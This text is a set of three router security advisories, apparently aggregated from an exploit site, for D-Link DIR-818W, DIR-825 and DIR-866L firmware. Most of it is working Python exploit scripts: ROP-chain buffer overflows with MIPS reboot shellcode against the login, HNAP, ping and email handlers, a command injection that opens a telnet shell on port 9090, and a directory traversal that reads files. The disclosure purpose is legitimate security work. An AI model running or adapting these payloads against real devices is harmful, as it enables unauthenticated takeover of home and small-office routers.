## Advisory Information
Title: DIR-818W Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-818W -- Wireless AC750 Dual Band Gigabit Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 3 security issues in DIR-818W firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed.
## Details
Buffer overflow in auth
--------------------------------------------------------------------
import socket
import struct
#Reboot shellcode in there
'''
2096 after id GET param, you can control the RA
'''
buf = "GET /dws/api/Login?id="
buf+="A"*2064+"AAAA" #S0 # uclibc system address
buf+="\x2A\xAF\xD0\x84" #S1 -- ROP2 (Pulls Sleep address from S2 which is also stored there before, loads SP+36 is filled in RA with ROP3 and calls Sleep)
buf+="\x2A\xB1\x4D\xF0" #S2 -- points to Sleep in library
buf+="\x2A\xB1\x4D\xF0" #JUNK S3
buf+="\x2A\xB1\x4D\xF0" #JUNK S4
buf+="\x2A\xB1\x4D\xF0" #JUNK S5
buf+="\x2A\xB0\xDE\x54" # S6 filled up with pointer to ROP4 which is ultimate mission
buf+="\x2A\xB1\x4D\xF0" #JUNK S7
buf+="\x2A\xAC\xAD\x70" # RETN address -- ROP1 (fills a0 with 3 for sleep and s1 is filled before with ROP2 address which is called)
buf+="C"*36 #
buf+="\x2A\xAC\xD5\xB4" # ROP3 (Fills in S4 the address of SP+16 and then jumps to ROP4 which calls SP+16 stored in S4)
buf+="E"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #Reboot shellcode Big endian
buf+="Y"*120
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nContent-Length:5000\r\n\r\nid="+"A"*5000+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------
Buffer overflow in HNAP
----------------------------------------------------------------------
import socket
import struct
'''
548 characters after SOapaction:http://purenetworks.com/HNAP1/GetDeviceSettings/ should work, although sprintf copies twice so only 242 characters are required including /var/run and /etc/templates/hnap which is concatenated with your string to create 548 characters
'''
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"B"*158
buf+="\x2A\xAF\xD0\x84" #S1 -- ROP2 (Pulls Sleep address from S2 which is also stored there before, loads SP+36 is filled in RA with ROP3 and calls Sleep)
buf+="\x2A\xB1\x4D\xF0" #S2 -- points to Sleep in library
buf+="AAAA"+"AAAA"+"AAAA" #s3,s4,s5 JUNK
buf+="\x2A\xB0\xDE\x54" # S6 filled up with pointer to ROP4 which is ultimate mission
buf+="AAAA" #s7 JUNK
buf+="\x2A\xAC\xAD\x70" # RETN address -- ROP1 (fills a0 with 3 for sleep and s1 is filled before with ROP2 address which is called)
buf+="C"*36
buf+="\x2A\xAC\xD5\xB4" # ROP3 (Fills in S4 the address of SP+16 and then jumps to ROP4 which calls SP+16 stored in S4)
buf+="C"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #Reboot shellcode Big endian
buf+="B"*28+"\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
-------------------------------------------------------------------
Command injection
---------------------------------------------------------------------
import socket
import struct
# CSRF or any other trickery, but probably only works when connected to network I suppose for v2.02
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
All posts by Loudagonda
D-Link DIR-825 (vC) – Multiple Vulnerabilities
## Advisory Information
Title: DIR-825 (vC) Buffer overflows in authentication,HNAP and ping functionalities. Also a directory traversal
issue exists which can be exploited
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed
issues as per the email communication. The vendor had also released the information on their security advisory
pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly
accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing
this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-825 (vC) -- Wireless AC750 Dual Band Gigabit Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 4 security issues in DIR-825 firmware which allows an attacker to exploit buffer overflows in
authentication, HNAP and Ping functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited
by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack
directly or using XSRF if not exposed. The ping functionality based buffer overflow and directory traversal would
require an attacker to be on network and use XSRF to exploit buffer overflow whereas would require some sort of
authentication as low privileged user atleast to exploit directory traversal.
## Details
Buffer overflow in auth
-----------------------------------------------------------------------
import socket
import struct
'''
287 + XXXX in query_string value, right now only working with Exit address as sleep address has bad chars which
disallows from using regular shellcode directly
'''
buf = "GET /dws/api/Login?test="
buf+="B"*251
buf+="CCCC" #s0
buf+="FFFF" #s1
buf+="FFFF" #s2
buf+="FFFF" #s3
buf+="XXXX" #s4
buf+="HHHH" #s5
buf+="IIII" #s6
buf+="JJJJ" #s7
buf+="LLLL"
buf+="\x2a\xbc\x8c\xa0" # retn address
buf+="C"*24 #
buf+="sh;;"
buf+="K"*20
buf+="\x2a\xc0\xd2\xa0" #s1
buf+="\x2a\xc0\xd2\xa0" #s1
buf
+="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCC"
buf+="&password=A HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml
+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
----------------------------------------------------------------------
Buffer overflow in HNAP
-----------------------------------------------------------------------
import socket
import struct
'''
4138 + XXXX in SoapAction value, right now only working with Exit address as sleep address has bad chars which
disallows from using regular shellcode directly
'''
buf = "POST /HNAP1/ HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="SOAPACTION:http://purenetworks.com/HNAP1/GetDeviceSettings/"+"A"*4138+"\x2a\xbc\x8c\xa0"+"D"*834+"\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+"Cache-Control: max-age=0\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143
Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: uid:1111;\r\n"
buf+="Content-Length: 13\r\n\r\ntest=test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
----------------------------------------------------------------------
Directory traversal
----------------------------------------------------------------------
import socket
import struct
'''
Useful to do directory traversal attack which is possible in html_response_page variable below which prints the
conf file, but theoretically any file, most likely only after login accessible
'''
payload="html_response_page=../etc/host.conf&action=do_graph_auth&login_name=test&login_pass=test1&login_n=test2&l
og_pass=test3&graph_code=63778&session_id=test5&test=test"
buf = "POST /apply.cgi HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+"Cache-Control: max-age=0\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143
Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: session_id=test5;\r\n"
buf+="Content-Length: "+str(len(payload))+"\r\n\r\n"
buf+=payload+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
----------------------------------------------------------------------
Buffer overflow in ping
----------------------------------------------------------------------
import socket
import struct
'''
282 + XXXX in ping_ipaddr value, right now only working with Exit address as sleep address has bad chars which
disallows from using regular shellcode directly
'''
payload="html_response_page=tools_vct.asp&action=ping_test&html_response_return_page=tools_vct.asp&ping=ping&ping_
ipaddr=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"+"\x2a\xbc\x8c\xa0"+"CCXXXXDDDDEEEE&test=test"
buf = "POST /ping_response.cgi HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+"Cache-Control: max-age=0\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143
Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: session_id=test5;\r\n"
buf+="Content-Length: "+str(len(payload))+"\r\n\r\n"
buf+=payload+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
---------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
D-Link DIR-866L – Multiple Buffer Overflow Vulnerabilities
## Advisory Information
Title: DIR-866L Buffer overflows in HNAP and send email functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR866L -- AC1750 Wi-Fi Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 2 security issue in DIR866L firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilities in hnap and send email functionalities. An attacker needs to be on wireless LAN or management interface needs to be exposed on Internet to exploit HNAP vulnerability but it requires no authentication. The send email buffer overflow does require the attacker to be on wireless LAN or requires to trick administrator to exploit using XSRF.
## Details
HNAP buffer overflow
----------------------------------------------------------------------
import socket
import struct
import string
import sys
BUFFER_SIZE = 2048
# Observe this in a emulator/debugger or real device/debugger
buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
buf+="FFFF"
buf+=struct.pack(">I",0x2abfc9f4) # s0 ROP 2 which loads S2 with sleep address
buf+="\x2A\xBF\xB9\xF4" #s1 useless
buf+=struct.pack(">I",0x2ac14c30) # s2 Sleep address
buf+="DDDD" #s3
buf+=struct.pack(">I",0x2ac0fb50) # s4 ROP 4 finally loads the stack pointer into PC
buf+=struct.pack(">I",0x2ac0cacc) # retn Loads s0 with ROP2 and ao with 2 for sleep
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGG" #This is the padding as SP is added with 32 bytes in ROP 1
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # This is the padding as SP is added with 36 bytes in ROP 2
buf+=struct.pack(">I",0x2abcebd0) # This is the ROP 3 which loads S4 with address of ROP 4 and then loads S2 with stack pointer address
buf+="GGGGGGGGGGGGGGGG"
buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x
buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n"
# Bad chars \x00 - \x20
# sleep address 2ac14c30
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
---------------------------------------------------------------------
# Send email buffer overflow
---------------------------------------------------------------------
import socket
import struct
import string
import sys
BUFFER_SIZE = 2048
# Observe this in a emulator/debugger or real device/debugger
buf = "GET /send_log_email.cgi?test=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
buf+="1111" #s0 Loaded argument in S0 which is loaded in a0
buf+=struct.pack(">I",0x2ac14c30) #s4 Sleep address 0x2ac14c30
buf+="XXXX"
buf+="FFFF" # s3
buf+="XXXX"
buf+="BBBB" # s5
buf+="CCCC" # s6
buf+="DDDD" # s7
buf+="DDDD" # extra pad
buf+=struct.pack(">I",0x2ABE94B8) # Retn address 2ABE94B8 ROP1
buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" #
buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" #
buf+="XXXX" #
buf+="BBBBBBBBBBBBBBBB" #16 bytes before shellcode
buf+="CCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
---------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley